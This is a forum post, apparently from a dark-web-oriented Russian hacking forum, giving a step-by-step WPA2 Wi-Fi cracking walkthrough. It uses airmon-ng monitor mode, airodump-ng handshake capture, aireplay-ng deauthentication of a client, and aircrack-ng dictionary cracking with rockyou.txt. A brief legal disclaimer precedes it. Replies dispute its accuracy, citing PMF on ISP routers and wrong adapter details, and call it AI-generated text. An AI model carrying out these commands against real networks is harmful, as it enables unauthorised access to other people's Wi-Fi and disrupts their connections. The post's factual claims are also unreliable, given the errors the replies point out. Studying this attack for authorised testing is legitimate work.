Классический взлом Wi-Fi c защитой WPA 2

Torba666

DarkWeb
SOC
Pentester
20.07.26
4
Penetration Tester, SOC Analyst, Dark Web Analyst
0
Всем привет, вы можете знать меня как Торба, достаточно популярный в очень узких кругах блогер по кибербезопасности, сегодня я решил написать статью о взломе вай фая, естественно все в целях образования, и это не гайд на взлом, а всего лишь разбор очень популярного вида атаки, которая теряет свою актуальность, всвязи с переходом на WPA 3,

*Данный материал предназначен исключительно для тестирования собственных сетей, получения официального разрешения владельца или для CTF/учебных полигонов. Любое использование против третьих лиц преследуется по закону.

итак начнем с того
что нам понадобится

  1. Kali Linux. Можно на виртуалке, можно на флешке. Важно, чтобы он видел Wi-Fi адаптер.
  2. Wi-Fi адаптер с поддержкой режима монитора. Встроенные карты ноутбуков часто не умеют отправлять нужные пакеты. Нужен внешний, например, на чипе RTL8812AU или Atheros AR9271.
  3. Терпение. Автоматические программы — это для блогеров. Мы будем делать руками, чтобы понимать каждый шаг.
Шаг 1.

По умолчанию твой адаптер просто получает пакеты, адресованные тебе. Нам нужно видеть всё, что происходит в эфире.

bash
Смотрим имя твоего интерфейса (обычно wlan0 или wlan1)
sudo airmon-ng

Отключаем всё, что мешает (NetworkManager мешает переключать режимы)
sudo systemctl stop NetworkManager

Переводим адаптер в режим монитора
sudo airmon-ng start wlan0

Теперь у тебя появится интерфейс, например, wlan0mon
Теперь твой адаптер слышит всех. Это как микрофон, который записывает все разговоры в комнате.

Шаг 2. Разведка: ищем цель

Запускаем поиск сетей. Нам нужна та, у которой есть клиенты.

bash
sudo airodump-ng wlan0mon
Ты увидишь таблицу. Нас интересуют:

  • BSSID – уникальный адрес роутера (типа AA:BB:CC
    Пожалуйста Войдите или Зарегистрируйтесь чтобы видеть скрытые ссылки или изображения.
    D:EE:FF).
  • CH – канал, на котором вещает сеть.
  • ENC – шифрование. Если видишь WPA2 – это то, что нам нужно. Без шифра (OPN) — ловить нечего, там и так все видят.
  • Data – количество перехваченных пакетов с данными. Если значение растет – есть активный клиент.
Запоминаем BSSID и канал выбранной сети. Останавливаем сканирование (Ctrl+C).

Шаг 3. Захват рукопожатия

Это сердце атаки. Когда устройство (твой телефон) подключается к роутеру, они обмениваются специальными пакетами — это и есть рукопожатие. В нем зашифрован пароль. Наша задача — его перехватить.

Запускаем захват на конкретной сети и канале:

bash
sudo airodump-ng -c 6 --bssid AA:BB:CC
Пожалуйста Войдите или Зарегистрируйтесь чтобы видеть скрытые ссылки или изображения.
D:EE:FF -w capture wlan0mon
Где:

  • -c 6 – канал, который ты запомнил.
  • --bssid ... – мак-адрес роутера.
  • -w capture – записываем всё в файл с именем capture.
Теперь мы ждём. Нам нужно, чтобы появилась строчка с твоим телефоном в таблице Stations (под основной). Это значит, что клиент виден.

Если клиент есть, но рукопожатие не захватывается, мы его выгоняем из сети. Когда он переподключится автоматически, мы поймаем рукопожатие.

В новом терминале:

bash
sudo aireplay-ng -0 2 -a AA:BB:CC
Пожалуйста Войдите или Зарегистрируйтесь чтобы видеть скрытые ссылки или изображения.
D:EE:FF -c MAC_телефона wlan0mon
Что значит:

  • -0 2 – послать 2 deauth-пакета (команда "отключись").
  • -a ... – роутер.
  • -c ... – телефон (клиент).
Телефон на секунду потеряет связь и сразу переподключится. В первом терминале, где запущен захват, ты увидишь сообщение WPA handshake: AA:BB:CC
Пожалуйста Войдите или Зарегистрируйтесь чтобы видеть скрытые ссылки или изображения.
D:EE:FF
. Это победа. У нас есть файл capture-01.cap, в котором лежит рукопожатие.

Шаг 4. Подбор пароля (самый нудный этап)

Рукопожатие зашифровано. Единственный способ получить пароль — перебирать варианты в офлайн-режиме. Мы будем использовать aircrack-ng и мощный словарь.

bash
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC
Пожалуйста Войдите или Зарегистрируйтесь чтобы видеть скрытые ссылки или изображения.
D:EE:FF capture-01.cap
Если у тебя нет rockyou.txt (он часто лежит в /usr/share/wordlists/), его нужно разархивировать:

bash
sudo gunzip /usr/share/wordlists/rockyou.txt.gz
Что происходит: программа берёт каждый пароль из словаря, шифрует его, сравнивает с рукопожатием. Если совпало — пароль найден.

Важный нюанс: rockyou.txt содержит 14 миллионов паролей. Если пароль сложный (2#kL9$pQ), такой словарь не поможет. Тогда нужны маски (правила, где мы знаем формат, например, дата рождения + имя).


Итог: почему это сработало?

Потому что WPA2 имеет слабое место — четырёхстороннее рукопожатие. Его можно перехватить, если ты находишься в радиусе действия. И если пароль есть в словаре, он будет взломан.

Что делают умные люди:

  • Используют пароли, которых нет в словарях (включают спецсимволы, меняют регистр).
  • Включают WPA3 (новый стандарт, там защита от этого метода).
 
Последнее редактирование модератором:
на всех роутерах от мтс билайн и ростелеком стоит pmf. пароли из rockyou не пересекаются с теми которые по дефолту генерируются роутерами. два чипа которые ты написал даже не ловят 5 ггц. и еще можно найти к чему доебаться, но уже понятно, что автор ни разу не взламывал вай фай, и даже не проводил фактчекинг этого нейротекста. этому гайду порядка 15 лет бтв
 
послушай бро, опять же скажу, что это не гайд, как ты написал в ответе, целью было просто рассказать как это работает изнутри для людей, которые не разбираются в этом и им было интересно узнать, ты начал придираться к словарью и так далее, я знаю, что на многих роутерах с завода стоят пароли, которых нет ни в каком словаре мира, и вообще про все, что ты написал. не надо думать, что ты тут самый умный, насчет метода, я писал, что он очень старый. посмотри на это по другому, я сюда не пособия для хакинга писать зашел
 
Пожалуйста Войдите или Зарегистрируйтесь чтобы видеть скрытые ссылки или изображения.
послушай бро, опять же скажу, что это не гайд, как ты написал в ответе, целью было просто рассказать как это работает изнутри для людей, которые не разбираются в этом и им было интересно узнать, ты начал придираться к словарью и так далее, я знаю, что на многих роутерах с завода стоят пароли, которых нет ни в каком словаре мира, и вообще про все, что ты написал. не надо думать, что ты тут самый умный, насчет метода, я писал, что он очень старый. посмотри на это по другому, я сюда не пособия для хакинга
у тебя в тексте фактических ошибки даже для времени когда эта атака могла бы сработать. поэтому тебе лучше самому разобраться в теме прежде чем плодить нейрослопы
 
хорошо, как скажешь бро, мы услышали твое мнение
 

Правила

  1. Все сделки — только через Гарант 0nixSecure
  2. Спам и деанон — бан навсегда
  3. Соблюдайте OpSec
  4. Запрещены дубли аккаунтов (мульти-аккаунты)
  5. Контент только по тематике форума
Назад
Верх